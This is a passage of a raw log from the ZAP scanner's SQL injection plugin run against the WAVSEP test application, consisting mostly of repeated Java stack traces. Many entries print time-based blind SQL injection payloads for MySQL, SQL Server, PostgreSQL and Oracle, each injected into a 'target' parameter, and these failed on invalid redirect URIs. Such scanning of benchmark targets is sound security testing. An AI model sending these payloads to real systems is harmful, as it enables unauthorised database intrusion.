org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681290 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%';(SELECT * FROM (SELECT(SLEEP(5)))gZGR)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%';(SELECT * FROM (SELECT(SLEEP(5)))gZGR)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681291 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;(SELECT * FROM (SELECT(SLEEP(5)))zpeS)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;(SELECT * FROM (SELECT(SLEEP(5)))zpeS)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681291 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681293 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681293 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt);SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt);SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681294 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681295 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681296 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681296 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt');SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt');SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681297 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(83)||CHR(98)||CHR(105),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(83)||CHR(98)||CHR(105),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681297 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681299 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(109)||CHR(74)||CHR(84),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(109)||CHR(74)||CHR(84),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681299 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at 